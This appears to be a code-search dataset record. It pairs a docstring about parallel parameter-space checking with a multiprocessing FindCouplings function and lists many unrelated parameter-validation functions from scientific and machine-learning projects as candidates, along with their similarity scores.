failed sources signature check. System \" \n f\"signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_optical_segments):\n sig = set(self.optical_system._amalgamated_optical_segments.keys())\n required = SEGMENT_GEO_SIG | self.optical_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed optical segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_optical_arcs):\n sig = set(self.optical_system._amalgamated_optical_arcs.keys())\n required = ARC_GEO_SIG | self.optical_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed optical arcs signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_stop_segments):\n sig = set(self.optical_system._amalgamated_stop_segments.keys())\n required = SEGMENT_GEO_SIG | self.stop_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed stop segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_stop_arcs):\n sig = set(self.optical_system._amalgamated_stop_arcs.keys())\n required = ARC_GEO_SIG | self.stop_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed stop arcs signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_target_segments):\n sig = set(self.optical_system._amalgamated_target_segments.keys())\n required = SEGMENT_GEO_SIG | self.target_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed target segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_target_arcs):\n sig = set(self.optical_system._amalgamated_target_arcs.keys())\n required = ARC_GEO_SIG | self.target_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed target arcs signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n else: # dimension == 3\n if bool(self.optical_system._amalgamated_sources):\n sig = set(self.optical_system._amalgamated_sources.keys())\n required = SOURCE_3D_SIG | self.input_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed sources signature check. System \" \n f\"signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_optical):\n sig = set(self.optical_system._amalgamated_optical.keys())\n required = TRIANGLE_GEO_SIG | self.optical_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed optical segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_stop):\n sig = set(self.optical_system._amalgamated_stop.keys())\n required = TRIANGLE_GEO_SIG | self.stop_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed stop segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_target):\n sig = set(self.optical_system._amalgamated_target.keys())\n required = TRIANGLE_GEO_SIG | self.target_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed target segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n else:\n print(\"No optical system found, so validating nothing.\")", "def is_valid(self,):\r\n return self.g > 0 and self.l > 0 and self.m1 > 0 and self.m2 > 0 and self.m3 > 0 and self.r1 > 0 and self.r2 > 0 and self.tau > 0 and self.theta1 > 0 and self.theta2 > 0 and self.theta3 > 0", "def check_variables(self, model):\n for rhs_var in model.rhs.keys():\n if rhs_var.name in model.variables.keys():\n var = model.variables[rhs_var.name]\n\n different_shapes = not np.array_equal(\n model.rhs[rhs_var].shape, var.shape\n )\n\n not_concatenation = not isinstance(var, pybamm.Concatenation)\n\n not_mult_by_one_vec = not (\n isinstance(\n var, (pybamm.Multiplication, pybamm.MatrixMultiplication)\n )\n and (\n pybamm.is_matrix_one(var.left)\n or pybamm.is_matrix_one(var.right)\n )\n )\n\n if different_shapes and not_concatenation and not_mult_by_one_vec:\n raise pybamm.ModelError(\n \"variable and its eqn must have the same shape after \"\n \"discretisation but variable.shape = \"\n \"{} and rhs.shape = {} for variable '{}'. \".format(\n var.shape, model.rhs[rhs_var].shape, var\n )\n )", "def _check_parameters(self, p, integral=False, name=None, sym=None):\n for h in range(self._.d + 1):\n for i in range(self._.d + 1):\n for j in range(self._.d + 1):\n p[h, i, j] = ASParameters. \\\n _check_parameter(h, i, j, p[h, i, j],\n integral=integral,\n name=name, sym=sym)", "def verify(self):\n errors = []\n\n if not self.parameters:\n errors.append(\n VerifierError(\n subject=self,\n global_error=\"The MCO has no defined parameters\",\n )\n )\n\n if not self.kpis:\n errors.append(\n VerifierError(\n subject=self, global_error=\"The MCO has no defined KPIs\"\n )\n )\n\n for parameter in self.parameters:\n errors += parameter.verify()\n\n for kpi in self.kpis:\n errors += kpi.verify()\n\n return errors", "def validate_params(self) -> None:\n # cap must be given when using logistic growth\n if (self.growth == \"logistic\") and (self.cap is False):\n msg = \"Capacity must be provided for logistic growth\"\n logging.error(msg)\n raise ValueError(msg)\n\n # If custom_seasonalities passed, ensure they contain the required keys.\n reqd_seasonality_keys = [\"name\", \"period\", \"fourier_order\"]\n if not all(\n req_key in seasonality\n for req_key in reqd_seasonality_keys\n for seasonality in self.custom_seasonalities\n ):\n msg = f\"Custom seasonality dicts must contain the following keys:\\n{reqd_seasonality_keys}\"\n logging.error(msg)\n raise ValueError(msg)\n\n # If extra_regressors passed, ensure they contain the required keys.\n all_regressor_keys = {\"name\", \"prior_scale\", \"mode\"}\n for regressor in self.extra_regressors:\n if not isinstance(regressor, dict):\n msg = f\"Elements in `extra_regressor` should be a dictionary but receives {type(regressor)}.\"\n _error_msg(msg)\n if \"name\" not in regressor:\n msg = \"Extra regressor dicts must contain the following keys: 'name'.\"\n _error_msg(msg)\n if not set(regressor.keys()).issubset(all_regressor_keys):\n msg = f\"Elements in `extra_regressor` should only contain keys in {all_regressor_keys} but receives {regressor.keys()}.\"\n _error_msg(msg)\n self._reqd_regressor_names = [\n regressor[\"name\"] for regressor in self.extra_regressors\n ]\n # check floor and cap\n if (self.cap is not False) and (\"cap\" not in self._reqd_cap_floor_names):\n self._reqd_cap_floor_names.append(\"cap\")\n if self.floor is not False and (\"floor\" not in self._reqd_cap_floor_names):\n self._reqd_cap_floor_names.append(\"floor\")", "def check_config(params, dannce_net, prediction):\n check_camnames(params)\n\n if params[\"exp\"] is not None:\n for expdict in params[\"exp\"]:\n check_camnames(expdict)\n\n if dannce_net:\n check_net_expval(params)\n check_vmin_vmax(params)", "def doParametersOfInterest(self):\n ''' ref : physicsmodel -> rvf\n self.modelBuilder.out.var(\"MH\").setRange(float(self.mHRange[0]),float(self.mHRange[1]))\n self.modelBuilder.out.var(\"MH\").setConstant(False)\n '''\n\n self.modelBuilder.doVar(\"mu[0,0,1000]\") ##mu is what we want to return (in string) name[starting_value,min,max] \n self.modelBuilder.doVar(\"Fvbf[0,0,1]\") ##mu is what we want to return (in string) name[starting_value,min,max] \n self.modelBuilder.doSet(\"POI\",\"mu,Fvbf\")\n self.modelBuilder.doVar(\"\")\n self.modelBuilder.factory_('expr::ggH_s_func(\"(@0-sqrt(@0))*(1.-@1)\", mu,Fvbf)')\n self.modelBuilder.factory_( 'expr::ggH_b_func(\"(1-sqrt(@0))*(1.-@1)\", mu,Fvbf)')\n self.modelBuilder.factory_( 'expr::ggH_sbi_func(\"sqrt(@0)*(1.-@1)\", mu,Fvbf)')\n\n self.modelBuilder.factory_('expr::vbfH_s_func(\"(@0-sqrt(@0))*(@1)\", mu,Fvbf)')\n self.modelBuilder.factory_( 'expr::vbfH_b_func(\"(1-sqrt(@0))*(@1)\", mu,Fvbf)')\n self.modelBuilder.factory_( 'expr::vbfH_sbi_func(\"sqrt(@0)*(@1)\", mu,Fvbf)')", "def check_all_parameters(self):\n global dtParameterDesc\n self.message = ''\n ok = True\n for par in self.parameters:\n if par in dtParameterDesc:\n pardata = dtParameterDesc[par]\n check = self.check_parameter(par, self.parameters[par])\n ok = ok and check\n if not check:\n self.message += ('\\n' if self.message != '' else '') + pardata[dtg.LANG] +\\\n (' вне диапазона' if dtg.LANG == 'ru' else ' out of range')\n\n return ok", "def checkParameters(self):\n self.DEBUG(\"EDPluginWaitMultiFile.checkParameters\")\n self.checkMandatoryParameters(self.dataInput, \"Data Input is None\")\n self.checkMandatoryParameters(self.dataInput.expectedFile, \"Data Input is None\")\n self.checkMandatoryParameters(self.dataInput.expectedSize, \"Data Input is None\")", "def _check_params(self):\n\n # verify that estimator1 and estimator2 have predict_proba\n if (not hasattr(self.estimator1_, 'predict_proba') or\n not hasattr(self.estimator2_, 'predict_proba')):\n raise AttributeError(\"Co-training classifier must be initialized \"\n \"with classifiers supporting \"\n \"predict_proba().\")\n\n if (self.p_ is not None and self.p_ <= 0) or (self.n_ is not None and\n self.n_ <= 0):\n raise ValueError(\"Both p and n must be positive.\")\n\n if self.unlabeled_pool_size <= 0:\n raise ValueError(\"unlabeled_pool_size must be positive.\")\n\n if self.num_iter <= 0:\n raise ValueError(\"num_iter must be positive.\")", "def check_parameters():\r\n for par in PARAM:\r\n if isinstance(par, ExperimentFrame):\r\n EXP.change_variable(**par())\r\n else:\r\n EXP.change_variable(**par)", "def _is_parameters_ok(self):\n if self.api_key is None:\n raise MissingParameterException(\"OpenWeatherMap neuron needs an api_key\")\n if self.location is None:\n raise MissingParameterException(\"OpenWeatherMap neuron needs a location\")\n\n return True", "def _is_parameters_ok(self):\n if self.api_key is None:\n raise MissingParameterException(\"OpenWeatherMap neuron needs an api_key\")\n if self.location is None:\n raise MissingParameterException(\"OpenWeatherMap neuron needs a location\")\n\n return True", "def validate_matrix(self, data, **kwargs):\n validate_matrix(data.get(\"params\"))", "def check(self):\n\n Rbo = self.get_Rbo()\n alpha = self.comp_alpha()\n\n if self.W0 < (self.W2 + self.W3):\n raise S51_WCheckError(\"You must have W2+W3 < W0\")\n\n if Rbo < self.H0 + self.H2:\n raise S51_RHCheckError(\"You must have H0+H2 < Rbo\")\n\n if alpha > pi / 2:\n raise S51_AlphaCheckError(\"You must have alpha < pi/2\")", "def check_params(self, params):\n legal_params_fns = [\n Sequential.fit, Sequential.predict, Sequential.predict_classes,\n Sequential.evaluate\n ]\n if self.build_fn is None:\n legal_params_fns.append(self.__call__)\n elif (not isinstance(self.build_fn, types.FunctionType) and\n not isinstance(self.build_fn, types.MethodType)):\n legal_params_fns.append(self.build_fn.__call__)\n else:\n legal_params_fns.append(self.build_fn)\n\n legal_params = []\n for fn in legal_params_fns:\n legal_params += tf_inspect.getargspec(fn)[0]\n legal_params = set(legal_params)\n\n for params_name in params:\n if params_name not in legal_params:\n if params_name != 'nb_epoch':\n raise ValueError('{} is not a legal parameter'.format(params_name))", "def params_ok(): \n \n if parameters['details'].lower() in ['true', 'yes', '1']:\n parameters['details'] = True\n elif parameters['details'].lower() in ['false', 'no', '0']:\n parameters['details'] = False\n else:\n print 'unrecognized input for details = %s, so set details=False' % parameters['details']\n parameters['details'] = False\n\n if not parameters['db_tables']:\n parameters['db_tables'] = DB_TABLES\n\n # FIXME ideally, pre-check for tables on hosts here before diving in\n\n return True # params are OK; otherwise, we returned False above" ]
[ "0.63886017", "0.6310672", "0.6199619", "0.6192125", "0.6176082", "0.61694586", "0.613159", "0.6075696", "0.60116005", "0.60115665", "0.5992061", "0.5970435", "0.59513295", "0.59481025", "0.5932262", "0.5915817", "0.58968824", "0.5866027", "0.58604413", "0.58546996", "0.58375925", "0.58375573", "0.58325803", "0.5825981", "0.5784302", "0.5778824", "0.57676834", "0.576186", "0.57133454", "0.5711805", "0.57001114", "0.56935096", "0.5691999", "0.5654682", "0.56437594", "0.5633121", "0.5633121", "0.5633121", "0.5631674", "0.5590833", "0.5578843", "0.55777925", "0.5574356", "0.555811", "0.5548875", "0.55454713", "0.5528521", "0.55122304", "0.550939", "0.5492451", "0.5486101", "0.54851764", "0.5482382", "0.54775655", "0.5474786", "0.54708785", "0.54690886", "0.5464669", "0.54464996", "0.5411782", "0.5409775", "0.53883797", "0.5382028", "0.5381762", "0.5370669", "0.5365636", "0.53593105", "0.5356754", "0.5353184", "0.534626", "0.5345122", "0.53384435", "0.5332505", "0.532314", "0.53228366", "0.53209907", "0.5318769", "0.5318197", "0.5312943", "0.53116834", "0.53061616", "0.5305841", "0.53045243", "0.53041714", "0.5301336", "0.5297185", "0.5291291", "0.5291207", "0.5290295", "0.52873987", "0.52712196", "0.52710766", "0.5268249", "0.5267427", "0.526123", "0.526123", "0.526026", "0.52502877", "0.5250202", "0.52497876" ]
0.53065354
80
We get points to check, and parallelize the checking of the points. This is the function that does all the work in terms of exploring the parameter space.
def FindCouplings(): l1v = np.linspace(l1min, l1max, num=48) l2v = np.logspace(np.log10(l2min), np.log10(l2max), num=48) l3v = np.linspace(l3min, l3max, num=48) gxv = np.linspace(gxmin, gxmax, num=48) p = multiprocessing.Pool() f = open(file_name, 'w+') line = '|l1--l2--l3--gx--minima--mass1--mass2--stable|' f.write(line+'\n') f.write('-'*90+'\n') f.close() for l1 in l1v: for l2 in l2v: start_time_loop = time.time() params = cartesian((l1, -l2, l3v, gxv)) print params.shape p.map(CheckCouplings, params) print("--- Loop has taken: %s seconds ---" % (time.time() - start_time_loop))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_parallel_computing(self, example_staypoints):\n sp = example_staypoints\n\n # without parallel computing code\n sp_ori, locs_ori = sp.as_staypoints.generate_locations(\n method=\"dbscan\", epsilon=10, num_samples=2, distance_metric=\"haversine\", agg_level=\"user\", n_jobs=1\n )\n # using two cores\n sp_para, locs_para = sp.as_staypoints.generate_locations(\n method=\"dbscan\", epsilon=10, num_samples=2, distance_metric=\"haversine\", agg_level=\"user\", n_jobs=2\n )\n\n # the result of parallel computing should be identical\n assert_geodataframe_equal(locs_ori, locs_para)\n assert_geodataframe_equal(sp_ori, sp_para)", "def final_check(points):\n for p in points:\n constraints = p.constraints\n if len(p.lies_on) == 1:\n if [x for x in p.lies_on][0].symify() is not None:\n p.x, p.y = [x for x in p.lies_on][0].arbitrary_point()\n return p\n else:\n return None\n elif len(p.lies_on) > 1:\n symified_constraints = []\n # Get all of the constraints that we have processed and given\n # locations to\n for x in p.lies_on:\n tmp = x.symify()\n if tmp is not None:\n symified_constraints.append(tmp)\n # Ensure that we have at least two constraints\n # (to define an intersection); if not go to the next point\n if len(symified_constraints) >= 2:\n # Compute the intersection\n intersection = sympy.intersection(*symified_constraints)\n if intersection:\n p.x = float(intersection[0].x)\n p.y = float(intersection[0].y)\n return p\n else:\n return None\n\n if all([type(c) == primitives.Line for c in constraints]):\n p.x = random.uniform(-1, 1)\n p.y = random.uniform(-1, 1)\n return p\n elif [type(c) for c in constraints].count(primitives.Circle) == 1:\n for c in constraints:\n if type(c) == primitives.Circle:\n circle = c\n break\n if circle.symify() is not None:\n p.x, p.y = circle.arbitrary_point()\n return p\n return None", "def check_keypoints(keypoints: Sequence[Sequence], rows: int, cols: int) -> None:\n for kp in keypoints:\n check_keypoint(kp, rows, cols)", "def Check(self, parameters):", "def check_evaluation_points(x, y):\n assert x.ndim == y.ndim == 1\n assert x.shape == y.shape\n assert x.dtype == y.dtype == np.float64", "def parameter_check(coordinates, \n neighbors, \n bandwidth, \n convergence, \n percentage):\n # Create a boolean vector to keep track of incorrect inputs\n incorrect_inputs = np.zeros(5, dtype = bool)\n # Check whether two-dimensional coordinates are provided\n if not type(coordinates) == np.ndarray:\n incorrect_inputs[0] = True\n elif not coordinates.shape[1] == 2:\n incorrect_inputs[0] = True\n # Check whether neighbors is a positive integer or float\n if not ((type(neighbors) == int and neighbors > 0)\n and not ((type(neighbors) == float) \n and (neighbors > 0)\n and (neighbors.is_integer() == True))):\n incorrect_inputs[1] = True\n # Check whether bandwidth is a positive integer or float\n if not bandwidth == None:\n if not ((type(bandwidth) == int and bandwidth > 0)\n or (type(bandwidth) == float) and bandwidth > 0):\n incorrect_inputs[2] = True\n # Check whether convergence is a positive integer or float\n if not convergence == None:\n if not ((type(convergence) == int and convergence > 0)\n or (type(convergence) == float) and convergence > 0):\n incorrect_inputs[3] = True\n # Check whether percentage is a valid percentage value\n if not percentage == None:\n if not ((type(percentage) == int and percentage >= 0 \n and percentage <= 100)\n or ((type(percentage) == float) and percentage >= 0 \n and percentage <= 100)):\n incorrect_inputs[4] = True\n # Define error messages for each parameter failing the tests\n errors = ['ERROR: coordinates: Must be a 2-column numpy.ndarray',\n 'ERROR: neighbors: Must be a whole-number int or float > 0',\n 'ERROR: bandwidth: Must be an int or float > 0, or None',\n 'ERROR: convergence: Must be an int or float > 0, or None',\n 'ERROR: percentage: Must be an int or float in [0, 100], or None']\n # Print eventual error messages and terminate the code\n if any(value == True for value in incorrect_inputs):\n for i in range(0, len(errors)):\n if incorrect_inputs[i] == True:\n print(errors[i])\n sys.exit()", "def check_additional_input():\r\n\r\n # Check if the cluster center input is correct\r\n RM.check_if_matrix(clust_cent, 'The cluster centers')\r\n RM.warn_if_bigger(clust_cent.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the cluster centers',\r\n 'the number of input parameters - 1')\r\n RM.check_if_bigger(clust_cent.shape[1], meta_model.get_in_par_means().shape[1] - 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the cluster centers')\r\n\r\n bounds = meta_model.get_in_par_intervals()\r\n\r\n for j in range(clust_cent.shape[0]):\r\n for i in range(bounds.shape[0]):\r\n RM.check_if_in_interval(bounds[i], clust_cent[j, i], i, ' In cluster center %x, the value')\r\n\r\n def check_PLSR_input():\r\n \"\"\" Checks model data of PLSR\r\n\r\n :return: Checks model data of PLSR\r\n \"\"\"\r\n\r\n RM.check_if_ndim_array(model_data, 3, 'Model data')\r\n RM.check_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the solution matrix',\r\n 'the number of input parameters')\r\n RM.warn_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1] + 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the solution matrix')\r\n RM.check_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1] - 1,\r\n 'The number of output parameters in the solution matrix',\r\n 'the number of output parameters')\r\n RM.warn_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1],\r\n 'The number of output parameters',\r\n 'the number of output parameters in the solution matrix')\r\n\r\n # Check if the additional data is correct\r\n\r\n if meta_model.get_type() == 'PLSR': # Additional check-up for PLSR\r\n check_PLSR_input()\r\n\r\n elif meta_model.get_type() == 'DLU': # Additional check-up for DLU\r\n raise TypeError('This part is not implemented yet')\r\n\r\n # if not isinstance(model_data, np.ndarray):\r\n # raise TypeError('The cluster input and output data is not stored in a multidimensional array')\r\n #\r\n # for clust_data in model_data:\r\n #\r\n # if not isinstance(clust_data[0], np.matrix) or not isinstance(clust_data[1], np.matrix):\r\n # raise TypeError('One of the input or output databases is not a matrix')\r\n #\r\n # if clust_data[0].shape[1] > meta_model.get_in_par_means().shape[1]:\r\n # warnings.warn('The number of input parameters for the input database of the clusters is bigger '\r\n # 'than the actual number of input parameters')\r\n #\r\n # elif clust_data[0].shape[1] < meta_model.get_in_par_means().shape[1]:\r\n # raise TypeError('The number of input parameters for the input database of the clusters is '\r\n # 'smaller than the actual numbers of input parameters')\r\n #\r\n # if clust_data[1].shape[1] > meta_model.get_out_par_means().shape[1]:\r\n # raise TypeError('The number of output parameters for the output database of the clusters is '\r\n # 'bigger than the actual number of output parameters')\r\n #\r\n # elif clust_data[1].shape[1] < meta_model.get_out_par_means().shape[1]:\r\n # raise TypeError('The number of output parameters for the output database of the clusters is '\r\n # 'smaller than the actual numbers of output parameters')\r\n #\r\n # if clust_data[0].shape[0] != clust_data[1].shape[0]:\r\n # raise TypeError('The number rows in the input and output database differ from each other')\r\n\r\n else: # No check-up is done when the meta-model is an unknown version\r\n warnings.warn('The additional cluster data can not be checked, for this kind of meta-model')\r\n\r\n RM.check_if_same_size(clust_cent.shape[0], model_data.shape[0],\r\n 'The number of clusters according to the cluster centers',\r\n 'The number of clusters according to the model_data')", "def brute_force(savedPnts, unitRadius, point):\n for pnt in savedPnts:\n d = distance(pnt, point)\n if d < unitRadius: return False\n return True", "def check_all(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim):\n\tcheck_dimensions(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)\n\tcheck_coords(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)\n\tcheck_consistent(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)\n\tcheck_type(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)\n\t#check_transposed(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)", "def grid_evaluation(param_list_one, param_list_two, param_eval, n_trials=16, \n aggr_method=np.mean, save_dir='data/', file_name='grid evaluation',\n save_to_disk=True, save_each=1000, chunksize=1.):\n \n \n if not list(param_list_two): # If `param_list_two` is empty\n params = param_list_one\n grid_shape = (len(param_list_one),)\n is_really_grid = False\n \n else:\n params = list(itertools.product(param_list_one, param_list_two))\n grid_shape = (len(param_list_one), len(param_list_two))\n is_really_grid = True\n \n def grid_fun(point): # Function to compute for each grid point\n \n trial_out = np.nan * np.ones((n_trials,))\n \n for i in np.arange(n_trials):\n \n if is_really_grid:\n trial_out[i] = param_eval(point[0], point[1])\n else: # If `param_list_two` is empty\n trial_out[i] = param_eval(point)\n \n return aggr_method(trial_out)\n \n n_grid_pts = len(params)\n \n # Recording procedure\n def record_experiment(grid):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n save_path = save_dir + now + ' ' + file_name + '.pkl'\n experiment = {\n 'date': now,\n 'rows': param_list_one,\n 'cols': param_list_two,\n 'n_trials': n_trials,\n 'grid': np.reshape(grid, grid_shape),\n 'path': save_path\n }\n if save_to_disk:\n utils.save_obj(experiment, save_path)\n return experiment\n \n # Set a pool of workers\n nb_workers = min(mp.cpu_count(), 24)\n print('Working with {} processes.'.format(nb_workers))\n pool = mp.Pool(nb_workers)\n \n # Iterate `grid_fun` across workers\n it = pool.imap(grid_fun, params, chunksize=chunksize)\n grid = np.nan * np.ones((n_grid_pts,))\n\n for idx, val in enumerate(tqdm(it, total=n_grid_pts)):\n grid[idx] = val\n \n # Make sure that we save after each couple of iterations\n if (idx >= save_each) and (idx % save_each == 0): \n experiment = record_experiment(grid)\n \n # Close pool\n pool.close()\n pool.join()\n \n experiment = record_experiment(grid)\n \n return experiment", "def pointfind(plat, plon, lat, lon, pdif = 1):\n\t\n\tfff = 10\n\twhile (fff > 1):\n\t\t\n\t\t#conditions for latitude (lat - 2d array of latitudes)\n\t\tc_lat=(lat>(plat-pdif))&(lat<(plat+pdif))\n\t\t#conditions for longiyude (lon - 2d array of longitudes)\n\t\tc_lon=(lon>(plon-pdif))&(lon<(plon+pdif))\n\t\t\n\t\t#combine both conditions together\n\t\tc_all=c_lat&c_lon\n\t\t\n\t\t#values of the points that fulfil conditions\n\t\tplatf = lat[numpy.nonzero(c_all)]\n\t\tplonf = lon[numpy.nonzero(c_all)]\n\t\t\n\t\t\t\t\n\t\t#indeces of the poin that fulfil conditions \n\t\tg = numpy.nonzero(c_all)\n\t\t\n\t\t\n\t\t#check if we have found uniq solution\n\t\tfff = platf.shape[0]\n\t\t# decrease window to reduce amount of solutions if we have more than one\n\t\t#print(pdif)\n\t\tpdif = pdif-0.001\n\tprint(\"coordinates of the point that fulfil conditions: \"+str(platf)+\" \"+str(plonf))\n\tprint(\"indeces of the point that fulfil conditions: \"+str(g[0])+\" \"+str(g[1]))\n\t\n\treturn(g, platf, plonf)", "def evaluate_all_points():\n start_time = timeit.default_timer()\n mua, vra = pgen.get_pdf()\n slack = ptsl.D\n\n all_alloc = list(itertools.product(range(1,ptsl.M+1),repeat=ptsl.NPH))\n riska = []\n f2 = open(\"risk-file-D216-NPH5.csv\",\"w\")\n f2.write(\"alloc1,alloc2,alloc3,alloc4,alloc5,risk,util\\n\")\n count = 0\n for a in all_alloc :\n a1, a2, a3, a4, a5 = a\n r = compute_risk(mua, vra, a, slack)\n \n if r > 0.00001 and r < 1 - 0.00001 :\n riska.append(r)\n util = a1 * mua[a1-1] + a2 * mua[a2-1] + a3 * mua[a3-1] + a4 * mua[a4-1] + a5 * mua[a5-1]\n f2.write(\"%d,%d,%d,%d,%d,%f,%f\\n\"%(a1,a2,a3,a4,a5,r,util))\n count = count + 1\n f2.close()\n np.save(\"stored_risk\",riska)\n elapsed = timeit.default_timer() - start_time\n print(\"Brute Force Evaluation Time for %d points : %fs\"%(count,elapsed))", "def search(y, x, optimize_on=\"te_loss\", split_method = 'mass'):\n\n \n\t# split the data (8 model)\n\tsplit_train = split.split(y, x, method= split_method)\n\n\t# large range of parameter\n\tdegrees = range(2, 15)\n\tlambdas = np.logspace(-5, 10)\n\n\n\tlambdas_star = []\n\tdegrees_star = []\n\tprint(\"start search\")\n\tfor i, splitted_set in enumerate(split_train):\n\t\tsub_y, sub_x, id_indices = splitted_set\n\n\t\t# first rough search with large scale\n\t\tlambda_star, degree_star, score = _inner_search(sub_y, sub_x, degrees, lambdas, optimize_on)\n\n\t\t# zoomed search around best parameters\n\t\t# zoomed_degree = range(degree_star-2, degree_star + 2)\n\t\tzoomed_lambda = np.logspace(lambda_star - 2, lambda_star + 2, 25)\n\t\tlambda_star, degree_star, score = _inner_search(sub_y, sub_x, degrees, zoomed_lambda, optimize_on)\n\n\t\t# store found values\n\t\tlambdas_star.append(lambda_star)\n\t\tdegrees_star.append(degree_star)\n\n\t\t# print summary\n\t\tprint(\"-------------------------------------\")\n\t\tprint(\"Set\", i)\n\t\tprint(\"-------------------------------------\")\n\t\tprint(\"lambda*:\", lambda_star)\n\t\tprint(\"degree: \", degree_star)\n\t\tif optimize_on == \"te_loss\":\n\t\t\tprint(\"test set loss: \", score)\n\t\telif optimize_on == \"accu\":\n\t\t\tprint(\"accuracy: \", score)\n\n\tprint(\"...............................\")\n\tprint(\"end\")\n\treturn lambdas_star, degrees_star", "def check_kpts(self):\n if 'fleurinp' in self.ctx.inputs:\n fleurinp = self.ctx.inputs.fleurinp\n else:\n fleurinp = get_fleurinp_from_remote_data(self.ctx.inputs.parent_folder)\n\n only_even_MPI = self.inputs.add_comp_para['only_even_MPI']\n forbid_single_mpi = self.inputs.add_comp_para['forbid_single_mpi']\n try:\n machines, mpi_tasks, omp_threads, message = optimize_calc_options(self.ctx.num_machines,\n self.ctx.num_mpiprocs_per_machine,\n self.ctx.num_cores_per_mpiproc,\n self.ctx.use_omp,\n self.ctx.suggest_mpi_omp_ratio,\n fleurinp,\n only_even_MPI=only_even_MPI,\n forbid_single_mpi=forbid_single_mpi)\n except ValueError as exc:\n self.report(exc)\n return self.exit_codes.ERROR_NOT_OPTIMAL_RESOURCES\n\n self.report(message)\n\n self.ctx.inputs.metadata.options['resources']['num_machines'] = machines\n self.ctx.inputs.metadata.options['resources']['num_mpiprocs_per_machine'] = mpi_tasks\n if self.ctx.use_omp:\n self.ctx.inputs.metadata.options['resources']['num_cores_per_mpiproc'] = omp_threads\n if 'environment_variables' not in self.ctx.inputs.metadata.options:\n self.ctx.inputs.metadata.options['environment_variables'] = {}\n self.ctx.inputs.metadata.options['environment_variables']['OMP_NUM_THREADS'] = str(omp_threads)", "def globalcheck(xx, checktimes, thres, n, nn):\n result = np.zeros((3, n))\n checkstep = nn // checktimes\n absxx = np.abs(xx)\n for i in range(n):\n for k in range(2):\n for j in range(checktimes):\n if absxx[1 + j * checkstep, k * n + i] > thres[k]:\n result[k, i] = 1\n break\n result[2, i] = np.max(result[:, i])\n\n return result", "def check(self, num_objfun):\n if not self.gp:\n raise Exception(\"No number of grid points provided\")\n\n if self.nadir_p and len(self.nadir_p) != num_objfun - 1:\n raise Exception(\"Too many or too few nadir points provided\")", "def check_location_confidence(self):\n\t\t## not the best way of doing things, but since the number of targets is fairly small its not a big deal\n\t\tepsilon_pixels = .05 * self.horizontal_resolution #arbitrary confidence factor\n\t\tepsilon_meters = .08\n\t\tpixel_distances = []\n\t\tactual_distances = []\n\t\tnum_observed = 0\n\t\tfor ti in self.targs:\n\t\t\tif ti.props_are_set:\n\t\t\t\tfor tj in self.targs:\n\t\t\t\t\tif tj.props_are_set: \n\t\t\t\t\t\tpixel_dist = np.linalg.norm(tj.position_camera - ti.position_camera)\n\t\t\t\t\t\tactual_dist = np.abs(tj.d_cam_image - ti.d_cam_image)\n\t\t\t\t\t\tif pixel_dist == 0:\n\t\t\t\t\t\t\tpixel_dist = 10000 #ignore two of the same points\n\t\t\t\t\t\t\tactual_dist = 10000\n\t\t\t\t\t\tpixel_distances.append(pixel_dist)\t\n\t\t\t\t\t\tactual_distances.append(actual_dist)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpixel_distances.append(10000)\n\t\t\t\t\t\tactual_distances.append(10000)\n\t\t\telse:\n\t\t\t\tfor _ in self.targs:\n\t\t\t\t\tpixel_distances.append(10000)\n\t\t\t\t\tactual_distances.append(10000)\n\t\tmin_ind_pixel = np.argmin(pixel_distances)\n\t\tmin_ind_actual = np.argmin(actual_distances)\n\t\t#min_ind is encoded in base (num_targets); decode it to find the closest two points\n\t\tbest_guys = [self.targs[min_ind_pixel/len(self.targs)],self.targs[min_ind_pixel%len(self.targs)]]\n\t\tif pixel_distances[min_ind_pixel] > epsilon_pixels or actual_distances[min_ind_actual] > epsilon_meters:\n\t\t\t#measurements are not trustworthy, return nothing\n\t\t\treturn None\n\n\t\treturn best_guys", "def iterative_function(points, numLines, numIter, e_tilde, gamma_tilde, beta_tilde):\n \n numPoints = len(points)\n \n # Randomly sample pairs and get the corresponding rho and theta parameters for a line fitted to the pair: \n # Returns a list of tuples - Each tuple has the rho and theta parameters for the 